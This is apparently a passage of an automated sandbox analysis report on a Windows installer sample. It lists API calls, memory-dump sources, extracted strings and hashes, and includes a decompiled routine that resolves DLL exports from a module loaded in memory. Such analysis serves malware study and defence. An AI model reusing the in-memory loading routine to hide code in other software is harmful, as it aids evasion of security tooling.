                                                                                                                                                                  • lstrlenW.KERNEL32(00000000,000000F9,00000001,00000000,000000F9,00000001,000000B8,00000000,00000000), ref: 00432B5C
                                                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 00432B68
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: lstrlen
                                                                                                                                                                  • String ID: p/E$p/E$regutil.cpp
                                                                                                                                                                  • API String ID: 1659193697-374004985
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • DefWindowProcW.USER32(?,00000082,?,?), ref: 00417784
                                                                                                                                                                  • SetWindowLongW.USER32 ref: 00417793
                                                                                                                                                                  • SetWindowLongW.USER32 ref: 004177A7
                                                                                                                                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 004177B7
                                                                                                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 004177D1
                                                                                                                                                                  • PostQuitMessage.USER32(00000000), ref: 0041782E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$Long$Proc$MessagePostQuit
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3812958022-0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • __init_pointers.LIBCMT ref: 004295AB
                                                                                                                                                                    • Part of subcall function 00429765: EncodePointer.KERNEL32(00000000,?,004295B0,004266A8,00454020,00000014), ref: 00429768
                                                                                                                                                                    • Part of subcall function 00429765: __initp_misc_winsig.LIBCMT ref: 00429789
                                                                                                                                                                    • Part of subcall function 00429765: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0042A38C
                                                                                                                                                                    • Part of subcall function 00429765: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0042A3A0
                                                                                                                                                                    • Part of subcall function 00429765: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0042A3B3
                                                                                                                                                                    • Part of subcall function 00429765: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0042A3C6
                                                                                                                                                                    • Part of subcall function 00429765: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0042A3D9
                                                                                                                                                                    • Part of subcall function 00429765: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 0042A3EC
                                                                                                                                                                    • Part of subcall function 00429765: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 0042A3FF
                                                                                                                                                                    • Part of subcall function 00429765: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0042A412
                                                                                                                                                                    • Part of subcall function 00429765: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0042A425
                                                                                                                                                                    • Part of subcall function 00429765: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 0042A438
                                                                                                                                                                    • Part of subcall function 00429765: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 0042A44B
                                                                                                                                                                    • Part of subcall function 00429765: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 0042A45E
                                                                                                                                                                    • Part of subcall function 00429765: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 0042A471
                                                                                                                                                                    • Part of subcall function 00429765: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0042A484
                                                                                                                                                                    • Part of subcall function 00429765: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0042A497
                                                                                                                                                                    • Part of subcall function 00429765: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0042A4AA
                                                                                                                                                                  • __mtinitlocks.LIBCMT ref: 004295B0
                                                                                                                                                                    • Part of subcall function 0042C0C1: InitializeCriticalSectionAndSpinCount.KERNEL32(00456300,00000FA0,?,?,004295B5,004266A8,00454020,00000014), ref: 0042C0DF
                                                                                                                                                                  • __mtterm.LIBCMT ref: 004295B9
                                                                                                                                                                    • Part of subcall function 00429621: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,004295BE,004266A8,00454020,00000014), ref: 0042BFDD
                                                                                                                                                                    • Part of subcall function 00429621: _free.LIBCMT ref: 0042BFE4
                                                                                                                                                                    • Part of subcall function 00429621: DeleteCriticalSection.KERNEL32(00456300,?,?,004295BE,004266A8,00454020,00000014), ref: 0042C006
                                                                                                                                                                  • __calloc_crt.LIBCMT ref: 004295DE
                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00429607
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$CriticalSection$Delete$CountCurrentEncodeHandleInitializeModulePointerSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2930087205-0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF,00000000,000000F8,00000000,?,?,?,00411168,000000B8,0000001C,000000F8), ref: 0041FAFD
                                                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF,?,?,?,00411168,000000B8,0000001C,000000F8,000000F8,000000F8,000000B0), ref: 0041FB96
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to initialize update bundle., xrefs: 0041FC30
                                                                                                                                                                  • detect.cpp, xrefs: 0041FBF8
                                                                                                                                                                  • BA aborted detect forward compatible bundle., xrefs: 0041FC02
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CompareString
                                                                                                                                                                  • String ID: BA aborted detect forward compatible bundle.$Failed to initialize update bundle.$detect.cpp
                                                                                                                                                                  • API String ID: 1825529933-918857910
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1001AF10(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8) {
                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                  				signed int _v12;
                                                                                                                                                                  				intOrPtr* _v16;
                                                                                                                                                                  				intOrPtr* _v20;
                                                                                                                                                                  				intOrPtr _v24;
                                                                                                                                                                  				intOrPtr _v28;
                                                                                                                                                                  				intOrPtr _v32;
                                                                                                                                                                  				intOrPtr* _v36;
                                                                                                                                                                  				intOrPtr* _v40;
                                                                                                                                                                  				intOrPtr* _v44;
                                                                                                                                                                  				intOrPtr* _t105;
                                                                                                                                                                  				void* _t174;
                                                                                                                                                                  				void* _t176;
                                                                                                                                                                  
                                                                                                                                                                  				_t172 = __edi;
                                                                                                                                                                  				_t122 = __ebx;
                                                                                                                                                                  				_v16 = _a4;
                                                                                                                                                                  				_t4 = _v16 + 4; // 0x7d83ec45
                                                                                                                                                                  				_v24 =  *_t4;
                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                  				_v20 =  *_v16 + 0x78;
                                                                                                                                                                  				if( *((intOrPtr*)(_v20 + 4)) != 0) {
                                                                                                                                                                  					_v8 = _v24 +  *_v20;
                                                                                                                                                                  					if( *(_v8 + 0x18) == 0 ||  *((intOrPtr*)(_v8 + 0x14)) == 0) {
                                                                                                                                                                  						SetLastError(0x7f);
                                                                                                                                                                  						return 0;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						if((_a8 >> 0x00000010 & 0x0000ffff) != 0) {
                                                                                                                                                                  							if( *(_v8 + 0x18) != 0) {
                                                                                                                                                                  								if( *((intOrPtr*)(_v16 + 0x30)) != 0) {
                                                                                                                                                                  									L19:
                                                                                                                                                                  									_t70 = _v16 + 0x30; // 0x51e84d8b
                                                                                                                                                                  									_v28 = E1000DFB8(_t122,  &_a8,  *_t70,  *(_v8 + 0x18), 8, E1001AAC0);
                                                                                                                                                                  									if(_v28 != 0) {
                                                                                                                                                                  										_v12 =  *(_v28 + 4) & 0x0000ffff;
                                                                                                                                                                  										L22:
                                                                                                                                                                  										if(_v12 <=  *((intOrPtr*)(_v8 + 0x14))) {
                                                                                                                                                                  											return _v24 +  *((intOrPtr*)(_v24 +  *((intOrPtr*)(_v8 + 0x1c)) + _v12 * 4));
                                                                                                                                                                  										}
                                                                                                                                                                  										SetLastError(0x7f);
                                                                                                                                                                  										return 0;
                                                                                                                                                                  									}
                                                                                                                                                                  									SetLastError(0x7f);
                                                                                                                                                                  									return 0;
                                                                                                                                                                  								}
                                                                                                                                                                  								_v36 = _v24 +  *((intOrPtr*)(_v8 + 0x20));
                                                                                                                                                                  								_v40 = _v24 +  *((intOrPtr*)(_v8 + 0x24));
                                                                                                                                                                  								_t105 = L1000CEAF(__ebx, _v24 +  *((intOrPtr*)(_v8 + 0x24)), __edi, __esi,  *(_v8 + 0x18) << 3);
                                                                                                                                                                  								_t176 = _t174 + 4;
                                                                                                                                                                  								_v44 = _t105;
                                                                                                                                                                  								 *((intOrPtr*)(_v16 + 0x30)) = _v44;
                                                                                                                                                                  								if(_v44 != 0) {
                                                                                                                                                                  									_v32 = 0;
                                                                                                                                                                  									while(_v32 <  *(_v8 + 0x18)) {
                                                                                                                                                                  										 *_v44 = _v24 +  *_v36;
                                                                                                                                                                  										 *((short*)(_v44 + 4)) =  *_v40;
                                                                                                                                                                  										_v32 = _v32 + 1;
                                                                                                                                                                  										_v36 = _v36 + 4;
                                                                                                                                                                  										_v40 = _v40 + 2;
                                                                                                                                                                  										_v44 = _v44 + 8;
                                                                                                                                                                  									}
                                                                                                                                                                  									_t66 = _v16 + 0x30; // 0x51e84d8b
                                                                                                                                                                  									E1000DA30( *(_v8 + 0x18), _t172,  *_t66,  *(_v8 + 0x18), 8, E1001AAF0);
                                                                                                                                                                  									_t174 = _t176 + 0x10;
                                                                                                                                                                  									goto L19;
                                                                                                                                                                  								}
                                                                                                                                                                  								SetLastError(0xe);
                                                                                                                                                                  								return 0;
                                                                                                                                                                  							}
                                                                                                                                                                  							SetLastError(0x7f);
                                                                                                                                                                  							return 0;
                                                                                                                                                                  						}
                                                                                                                                                                  						if((_a8 & 0xffff) >=  *((intOrPtr*)(_v8 + 0x10))) {
                                                                                                                                                                  							_v12 = (_a8 & 0xffff) -  *((intOrPtr*)(_v8 + 0x10));
                                                                                                                                                                  							goto L22;
                                                                                                                                                                  						}
                                                                                                                                                                  						SetLastError(0x7f);
                                                                                                                                                                  						return 0;
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				SetLastError(0x7f);
                                                                                                                                                                  				return 0;
                                                                                                                                                                  			}

















                                                                                                                                                                  APIs
                                                                                                                                                                  • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,1002093E), ref: 1001AF42
                                                                                                                                                                  • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,1002093E), ref: 1001AF6E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1452528299-0
                                                                                                                                                                  • Opcode ID: 5f9b1837587a101ea96a0657a83a7c2693123edf5df009f3321dc1919bef460e
                                                                                                                                                                  • Instruction ID: 27e70c85a8907a9ba83dd9d1e295feb5005e929d9b7098f35adbadc5d796aaa6
                                                                                                                                                                  • Opcode Fuzzy Hash: 5f9b1837587a101ea96a0657a83a7c2693123edf5df009f3321dc1919bef460e
                                                                                                                                                                  • Instruction Fuzzy Hash: 3371C374A00109EFDB08CF98C995AAEB7F1FF49304F618599E915AB345D734EA81CFA0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • Unexpected elevated message sent to child process, msg: %u, xrefs: 00415B2E
                                                                                                                                                                  • elevation.cpp, xrefs: 00415B22
                                                                                                                                                                  • Failed to save state., xrefs: 00415A30
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandleMutexRelease
                                                                                                                                                                  • String ID: Failed to save state.$Unexpected elevated message sent to child process, msg: %u$elevation.cpp
                                                                                                                                                                  • API String ID: 4207627910-1576875097
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • InternetCrackUrlW.WININET(?,00000000,90000000,0000003C), ref: 00438938
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00438942
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CrackErrorInternetLast
                                                                                                                                                                  • String ID: <$=VB$uriutil.cpp
                                                                                                                                                                  • API String ID: 3164790631-4167828551
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00431C19: GetModuleFileNameW.KERNEL32(r@,?,00000104,?,00000104,?,00000000,00401C5F,?,004072ED,?,00000000,?,?,?,00401C5F), ref: 00431C3A
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,00000001,000000FF,?,000000FF,?,00000001,?,?,00000001,?,?,00000000,?,?), ref: 00421485
                                                                                                                                                                    • Part of subcall function 00431437: CompareStringW.KERNEL32(00000000,00000001,00000000,000000FF,00000000,000000FF,00000000,00000000,00000003,00000000,00000000,00000003,00000000), ref: 0043147B
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to open container: %ls., xrefs: 0042144A
                                                                                                                                                                  • Failed to extract all payloads from container: %ls, xrefs: 00421503
                                                                                                                                                                  • Failed to skip the extraction of payload: %ls from container: %ls, xrefs: 004214E2
                                                                                                                                                                  • Failed to extract payload: %ls from container: %ls, xrefs: 004214D6
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CompareString$FileModuleName
                                                                                                                                                                  • String ID: Failed to extract all payloads from container: %ls$Failed to extract payload: %ls from container: %ls$Failed to open container: %ls.$Failed to skip the extraction of payload: %ls from container: %ls
                                                                                                                                                                  • API String ID: 3080012752-3891707333
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00430816,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00430816,004079F6,00000000,00000000), ref: 004342A8
                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00430816,004079F6,00000000,00000000,0000FDE9), ref: 004342B4
                                                                                                                                                                    • Part of subcall function 00431231: GetProcessHeap.KERNEL32(00000000,0000005A,?,00434024,0000005A,8007000D,8007000D,00401C5F,?,00430A87,8007000D,?,00000000,00000000,8007000D), ref: 00431239
                                                                                                                                                                    • Part of subcall function 00431231: HeapSize.KERNEL32(00000000,?,00434024,0000005A,8007000D,8007000D,00401C5F,?,00430A87,8007000D,?,00000000,00000000,8007000D), ref: 00431240
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Heap$ByteCharErrorLastMultiProcessSizeWide
                                                                                                                                                                  • String ID: strutil.cpp
                                                                                                                                                                  • API String ID: 3662877508-3612885251
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • SetFilePointerEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 004234FF
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?), ref: 00423509
                                                                                                                                                                  Strings
                                                                                                                                                                  • cabextract.cpp, xrefs: 0042352D
                                                                                                                                                                  • Invalid seek type., xrefs: 00423495
                                                                                                                                                                  • Failed to move file pointer 0x%x bytes., xrefs: 0042353A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                                                                  • String ID: Failed to move file pointer 0x%x bytes.$Invalid seek type.$cabextract.cpp
                                                                                                                                                                  • API String ID: 2976181284-417918914
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00431D07: SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,00000104,00000000,?,00413C09,0000001C,00000000,00000000,?,?,0040A090), ref: 00431D27
                                                                                                                                                                  • RemoveDirectoryW.KERNEL32(00000002,00000001,00000002,00401414,00000001,00401414,?,00000002,0000001C,00401414,00020006,00000001,00000000,00401414), ref: 00409F7C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DirectoryFolderPathRemove
                                                                                                                                                                  • String ID: Failed to allocate regid folder path.$Failed to find local %hs appdata directory.$per-machine$per-user
                                                                                                                                                                  • API String ID: 293476170-2037127396
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000001,00000000,000000FF,?,000000FF,00000000,00000000,00000000,-80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,00000000,000002A8,000000F8,0000035C), ref: 0041FA0D
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,-80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,00000000,000002A8,000000F8,0000035C,?,?,?,0040A608,00000001,000002A8,0000035C,00000000), ref: 0041FA5B
                                                                                                                                                                  Strings
                                                                                                                                                                  • SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0041F9AF
                                                                                                                                                                  • Failed to enumerate uninstall key for related bundles., xrefs: 0041FA6A
                                                                                                                                                                  • Failed to open uninstall registry key., xrefs: 0041F9D5
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCompareString
                                                                                                                                                                  • String ID: Failed to enumerate uninstall key for related bundles.$Failed to open uninstall registry key.$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                                                                                  • API String ID: 446873843-2531018330
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • CopyFileW.KERNEL32(00000000,00000000,00000000,00000000,00401105,?,?,004367F0,00000000,00000000,?,00000000,?,004131F5,8BE275C0,?), ref: 004366FF
                                                                                                                                                                  • GetLastError.KERNEL32(?,004367F0,00000000,00000000,?,00000000,?,004131F5,8BE275C0,?,00000001,00000003,000007D0,00401414,?,?), ref: 0043670D
                                                                                                                                                                  • CopyFileW.KERNEL32(00000000,00000000,?,00000000,00000000,?,004367F0,00000000,00000000,?,00000000,?,004131F5,8BE275C0,?,00000001), ref: 00436773
                                                                                                                                                                  • GetLastError.KERNEL32(?,004367F0,00000000,00000000,?,00000000,?,004131F5,8BE275C0,?,00000001,00000003,000007D0,00401414,?,?), ref: 0043677D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CopyErrorFileLast
                                                                                                                                                                  • String ID: fileutil.cpp
                                                                                                                                                                  • API String ID: 374144340-2967768451
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to check the dictionary of unique dependencies., xrefs: 0041E75A
                                                                                                                                                                  • Failed to add "%ls" to the list of dependencies to ignore., xrefs: 0041E7AD
                                                                                                                                                                  • Failed to create the string dictionary., xrefs: 0041E722
                                                                                                                                                                  • Failed to add "%ls" to the string dictionary., xrefs: 0041E7A6
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _wcstok_s
                                                                                                                                                                  • String ID: Failed to add "%ls" to the list of dependencies to ignore.$Failed to add "%ls" to the string dictionary.$Failed to check the dictionary of unique dependencies.$Failed to create the string dictionary.
                                                                                                                                                                  • API String ID: 86363921-3348696663
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00435B74
                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 00435B90
                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00435C17
                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00435C22
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: StringVariant$AllocClearFreeInit
                                                                                                                                                                  • String ID: xmlutil.cpp
                                                                                                                                                                  • API String ID: 760788290-1270936966
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateDirectoryW.KERNEL32(00401F17,004021A7,00000000,00000000,?,0041399D,00000000,00000000,00401F17,00000000,00401DDF,00000000,?,?,0040878A,00401F17), ref: 0043785E
                                                                                                                                                                  • GetLastError.KERNEL32(?,0041399D,00000000,00000000,00401F17,00000000,00401DDF,00000000,?,?,0040878A,00401F17,00000000,00000000), ref: 0043786C
                                                                                                                                                                  • CreateDirectoryW.KERNEL32(00401F17,004021A7,00401EAB,?,0041399D,00000000,00000000,00401F17,00000000,00401DDF,00000000,?,?,0040878A,00401F17,00000000), ref: 004378D3
                                                                                                                                                                  • GetLastError.KERNEL32(?,0041399D,00000000,00000000,00401F17,00000000,00401DDF,00000000,?,?,0040878A,00401F17,00000000,00000000), ref: 004378DD
                                                                                                                                                                    • Part of subcall function 0043791E: GetFileAttributesW.KERNEL32(00401F17,00000000,?,00437885,00401F17,00000000,?,0041399D,00000000,00000000,00401F17,00000000,00401DDF,00000000), ref: 00437927
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateDirectoryErrorLast$AttributesFile
                                                                                                                                                                  • String ID: dirutil.cpp
                                                                                                                                                                  • API String ID: 925696554-2193988115
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • CertGetCertificateContextProperty.CRYPT32(00000000,00000003,00000000,00000000), ref: 00438156
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00412AAC,?,00000003,00000000,00000000), ref: 00438160
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
